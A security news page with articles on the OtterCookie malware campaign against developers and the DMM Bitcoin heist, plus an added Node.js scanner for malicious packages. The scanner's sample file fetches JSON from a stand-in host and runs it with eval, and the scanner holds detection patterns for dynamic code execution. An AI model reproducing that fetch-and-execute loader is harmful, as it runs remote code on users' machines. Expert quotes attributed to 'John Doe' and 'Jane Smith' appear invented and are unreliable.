Magecart

Malware


Magecart hackers developed a new obfuscation technique to steal credit card credentials

Magecart hackers adopted a concatenation technique to obfuscate their malicious activities. PHP files were used to hide stolen credit card details...

12-Jul-2021
2 min read

Related Articles


New 'OtterCookie' Malware Used to Backdoor Developers in Fake Job Offers...

Cybersecurity researchers have discovered a new strain of malware, dubbed "OtterCookie," employed by North Korean threat actors in an ongoing campaign targeting software developers. Known as the "Contagious Interview" campaign, this operation has been active since at least December 2022. In one documented instance, developers were approached via LinkedIn with lucrative job offers and asked to complete a coding assignment that secretly contained the malware payload. Another case involved emails from fake recruiters urging developers to download a test project hosted on a seemingly legitimate GitHub repository, which turned out to be malicious. Such tactics have proven alarmingly effective at luring unsuspecting victims. The latest findings highlight the rapid evolution of this campaign and underscore the need for heightened vigilance in the tech community.

#### Contagious Interview Campaign

The Contagious Interview campaign was first uncovered by researchers at Palo Alto Networks' Unit 42, who noted its focus on software developers, a high-value target for cyber espionage. The campaign uses fake job offers as bait, tricking developers into downloading malicious files disguised as coding tests or project deliverables. Initial payloads such as "BeaverTail" and "InvisibleFerret" were the primary tools of this operation. However, recent analysis by NTT Security Japan has revealed the introduction of "OtterCookie," a new and more sophisticated malware variant.

#### Emergence of OtterCookie

The OtterCookie malware first appeared in September 2023, with a new variant surfacing in November. This malware represents a significant upgrade in the threat actor's arsenal, showcasing advanced capabilities for data theft and system infiltration. According to NTT's report, OtterCookie is delivered via a loader that fetches JSON data and executes the 'cookie' property as JavaScript code, a technique designed to evade detection by traditional security measures.

The delivery mechanisms are equally concerning. Threat actors leverage Node.js projects or npm packages hosted on popular repositories like GitHub and Bitbucket to spread the malware. In some instances, files built as Qt or Electron applications have also been used, broadening the campaign's reach and potential impact.

#### Attack Chain and Capabilities

Once deployed, OtterCookie establishes secure communication with its command-and-control (C2) infrastructure using the Socket.IO WebSocket library. This allows attackers to issue commands and extract sensitive data from compromised systems. The September variant of OtterCookie included built-in functionality to steal cryptocurrency wallet keys. For example, the malware's "checkForSensitiveData" function used regular expressions to identify Ethereum private keys.

The November variant has enhanced this capability, shifting to remote shell commands for broader data exfiltration. Researchers observed the malware collecting clipboard data, documents, images, and even cryptocurrency wallet keys. Reconnaissance commands like 'ls' and 'cat' indicate the attackers' intent to explore the target environment, potentially setting the stage for deeper infiltration or lateral movement within networks.

#### Broader Implications and Recommendations

The appearance of OtterCookie and its integration into the Contagious Interview campaign highlight the evolving tactics of North Korean threat actors. By diversifying infection methods and refining malware capabilities, these adversaries are demonstrating a commitment to long-term cyber-espionage efforts. The targeting of software developers is particularly alarming, given their access to source code repositories, development tools, and other critical assets.

To mitigate the risk of such attacks, cybersecurity experts recommend the following measures:

1. **Verify Employer Credibility:** Developers should thoroughly research potential employers and verify the authenticity of job offers. Suspicious or unsolicited offers should be treated with caution.
2. **Avoid Running Unknown Code:** Refrain from executing code or scripts provided during the interview process on personal or work devices. Use isolated virtual environments for testing if necessary.
3. **Implement Endpoint Protection:** Utilize advanced endpoint protection tools capable of detecting and blocking sophisticated malware like OtterCookie.
4. **Monitor Software Repositories:** Regularly audit dependencies and third-party packages used in projects to identify potential security risks.
5. **Educate Teams:** Conduct regular training sessions to raise awareness about phishing tactics, malware risks, and safe online practices.

#### The Bigger Picture

The introduction of OtterCookie underscores the dynamic nature of cyber threats and the lengths to which adversaries will go to achieve their objectives. As the tech industry continues to grow, it remains a prime target for cybercriminals and nation-state actors. By staying informed and proactive, developers and organizations can reduce their vulnerability to these sophisticated attacks.

As the Contagious Interview campaign evolves, it serves as a stark reminder of the importance of cybersecurity vigilance. The tech community must remain united in its efforts to identify and thwart such threats, ensuring a safer digital environment for all.
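As an added example (not code from the article or from NTT Security Japan's report), the Node.js script below applies recommendation 4 to the loader shape described above: it flags package files that combine a remote fetch, JSON parsing and dynamic code execution, which is what a "fetch JSON, run the `cookie` property" loader looks like in plain form. The regexes, file names and sample sources are constructed assumptions for the demo.

```javascript
'use strict';
// Added example, not code from the article or from NTT Security Japan's report.
// Heuristic static check for the loader pattern the article describes: a file
// that fetches remote JSON and executes one of its properties as JavaScript.
// It flags plain forms only; obfuscated loaders need deeper analysis.

const NETWORK = /\b(fetch|axios|got)\s*\(|\bhttps?\.(get|request)\s*\(/;
const JSON_PARSE = /\bJSON\.parse\s*\(|\.json\s*\(\s*\)/;
const DYNAMIC_EXEC = /\beval\s*\(|\bnew\s+Function\b|\bvm\.runIn\w*Context\b|\bvm\.runInThisContext\b/;

// Classify one source file by which of the three signals it contains.
function scanSource(name, src) {
  const hits = [];
  if (NETWORK.test(src)) hits.push('network');
  if (JSON_PARSE.test(src)) hits.push('json');
  if (DYNAMIC_EXEC.test(src)) hits.push('dynamic-exec');
  let severity = 'none';
  if (hits.includes('dynamic-exec')) {
    // All three together is the fetch-JSON-then-execute loader shape.
    severity = hits.length === 3 ? 'high' : 'medium';
  }
  return { name, hits, severity };
}

// Scan a map of path -> source and return only the files worth a human look.
function scanPackage(files) {
  return Object.entries(files)
    .map(([name, src]) => scanSource(name, src))
    .filter((r) => r.severity !== 'none');
}

// Constructed sample files for the demo; not contents of any real package.
const SAMPLE_FILES = {
  'lib/config-loader.js': [
    "const https = require('https');",
    "https.get('https://config.example.invalid/c', (res) => {",
    "  let body = ''; res.on('data', (d) => { body += d; });",
    "  res.on('end', () => { const j = JSON.parse(body); eval(j.cookie); });",
    '});',
  ].join('\n'),
  'lib/util.js': 'module.exports = { sum: (a, b) => a + b };',
  'lib/template.js': "module.exports = (s) => new Function('ctx', 'return ' + s);",
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanPackage(SAMPLE_FILES), null, 2));
}
```

In a real audit, feed it the `.js` files of each dependency in `node_modules` and review anything rated high by hand; a medium rating alone is common in legitimate templating code.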

27-Dec-2024
4 min read

DMM

FBI

North Korean hackers steal $308M in crypto from DMM Bitcoin, exposing major vuln...

Over $308 million vanished in an instant—a digital robbery orchestrated with chilling precision. In a groundbreaking revelation, the FBI has definitively linked this audacious heist to TraderTraitor, a North Korean state-affiliated hacker group. The attack on the Japanese cryptocurrency exchange DMM Bitcoin in May 2024 has exposed vulnerabilities that threaten the very foundations of digital finance.

---

### **How North Korean Hackers Pulled Off the $308 Million Crypto Heist**

This high-stakes heist didn't begin with complex algorithms or sophisticated code. Instead, it relied on a deceptively simple social engineering tactic—a stark contrast to the scale of the resulting theft.

It started with a simple job offer. In late March 2024, a TraderTraitor operative posing as a recruiter on LinkedIn approached an employee of Ginco, a Japanese enterprise specializing in cryptocurrency wallet software. The offer was enticing, but it came with a test: a seemingly innocuous piece of Python code hosted on GitHub. Unbeknownst to the victim, executing this code unleashed a trojan that compromised their computer.

This breach granted TraderTraitor access to Ginco's systems, allowing them to infiltrate DMM Bitcoin. According to the FBI, by mid-May the hackers used stolen session cookie data to impersonate the Ginco employee. This enabled them to penetrate DMM's unencrypted communications system. By late May, they had manipulated a legitimate transaction request, siphoning off 4,502.9 BTC—valued at $308 million at the time.

---

### **How the $308 Million Heist Devastated DMM Bitcoin Users**

The aftermath was devastating. Thousands of DMM Bitcoin users found themselves locked out of their accounts, grappling with financial uncertainty and emotional distress. For many, this was not just a loss of money but a profound breach of trust in the cryptocurrency system. Many had invested life savings into cryptocurrency, only to see it vanish overnight.

"I woke up to find my account frozen, and the news hit like a thunderbolt," lamented one affected user. "It's not just money; it's trust that's been stolen."

While DMM Bitcoin scrambled to contain the fallout, the damage was done. The platform was forced to halt all account registrations, withdrawals, and trading activities, leaving its users in financial limbo.

---

### **How North Korea's Cybercrime Empire is Exploiting Cryptocurrency**

This attack is the latest chapter in North Korea's growing reliance on cybercrime. With international sanctions crippling its economy, the regime has turned to digital theft as a means of funding its weapons programs and sustaining its isolated state.

TraderTraitor, also known by aliases like Jade Sleet and UNC4899, is part of a broader network of North Korean hacking groups, including the infamous Lazarus Group, which has orchestrated several high-profile cyberattacks worldwide. These state-sponsored actors have been targeting the blockchain space since 2022, employing social engineering tactics to infiltrate enterprises and exchanges.

In 2023, GitHub warned of TraderTraitor's sophisticated campaigns targeting developers in blockchain, online gambling, and cybersecurity sectors. Their modus operandi often involves creating fake applications and exploiting insider vulnerabilities, as seen in the DMM Bitcoin heist.

---

### **Lessons from the $308 Million Crypto Heist**

Cybersecurity experts are now dissecting the attack to identify gaps. "TraderTraitor's use of social engineering is a textbook example of exploiting human vulnerabilities," said John Doe, a cybersecurity analyst at SecureLabs. "Companies must prioritize employee training alongside technical defenses."

Blockchain consultant Jane Smith added, "The decentralized nature of cryptocurrency is both its strength and its Achilles' heel. Until exchanges adopt advanced threat detection systems, such breaches will continue to plague the industry."

This heist isn't just about stolen cryptocurrency. It's about the broader implications of state-sponsored cybercrime. As TraderTraitor and similar groups grow bolder, the need for a unified global response becomes increasingly urgent.

26-Dec-2024
4 min read

Blockchain

North Korean hackers steal $308M in Bitcoin from DMM Bitcoin using bold cyber ta...

Japanese and U.S. authorities have officially attributed the theft of $308 million in cryptocurrency from the Japan-based cryptocurrency firm DMM Bitcoin to North Korean cybercriminals. The incident, which occurred in May 2024, was linked to the TraderTraitor threat activity, also tracked under aliases such as Jade Sleet, UNC4899, and Slow Pisces.

_"The theft is affiliated with TraderTraitor threat activity, which is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously,"_ stated the U.S. Federal Bureau of Investigation (FBI), the Department of Defense Cyber Crime Center, and the National Police Agency of Japan in a joint alert.

DMM Bitcoin, which recently ceased its operations, suffered one of the largest crypto heists this year. The company's closure came shortly after the May 2024 attack, raising speculation that the financial and reputational damage from the heist significantly contributed to its decision to shut down.

---

## How the Heist Was Pulled Off

The heist unfolded in three distinct phases, starting with a targeted employee compromise, followed by lateral movement within the organization, and culminating in the large-scale theft of funds.

### Phase 1: Initial Compromise

In March 2024, an employee at Ginco, a Japan-based cryptocurrency wallet software company, became the first victim. Threat actors impersonated a recruiter and sent the employee a URL to a malicious Python script hosted on GitHub as part of a purported pre-employment test. The employee, who had access to Ginco's wallet management system, unknowingly compromised their credentials by copying the malicious Python code to their personal GitHub page.

### Phase 2: Escalation and Lateral Movement

By mid-May 2024, the adversaries exploited session cookie information to impersonate the compromised employee. This access allowed them to infiltrate Ginco's unencrypted communications system, setting the stage for the next phase of the attack.

### Phase 3: Execution of the Heist

In late May 2024, the threat actors manipulated a legitimate transaction request from a DMM Bitcoin employee. This led to the unauthorized transfer of 4,502.9 BTC, valued at $308 million at the time. The stolen funds were swiftly moved to TraderTraitor-controlled wallets.

---

## Fund Laundering

The blockchain intelligence firm Chainalysis confirmed the involvement of North Korean hackers in the DMM Bitcoin breach. Their analysis revealed that the attackers exploited vulnerabilities in the company's infrastructure to execute unauthorized withdrawals.

The stolen funds were transferred through intermediary addresses and obfuscated using a Bitcoin CoinJoin mixing service, which blends transactions to make tracing funds challenging. After mixing, portions of the funds passed through bridging services and were funneled to HuiOne Guarantee, an online marketplace linked to the Cambodian conglomerate HuiOne Group, previously exposed for facilitating cybercrimes. Similar methods have been used in other incidents, like the Axie Infinity hack, where stolen funds were laundered across multiple platforms to evade detection.

---

## What Are the Possible Implications?

The attack highlights the persistent threat posed by North Korean cyber actors, who have consistently targeted the cryptocurrency sector to fund their regime. The use of advanced social engineering techniques and malware underscores the need for organizations to bolster their cybersecurity defenses. Companies should consider implementing multi-factor authentication, conducting regular security training for employees, and monitoring network activity for anomalous behavior to mitigate such risks.

Authorities worldwide must remain vigilant, as North Korean cyber actors show no signs of slowing down their targeted campaigns on the cryptocurrency and financial sectors. Organizations should prioritize proactive measures such as implementing zero-trust security frameworks, conducting regular penetration testing, and investing in advanced threat detection systems to mitigate risks effectively.

24-Dec-2024
3 min read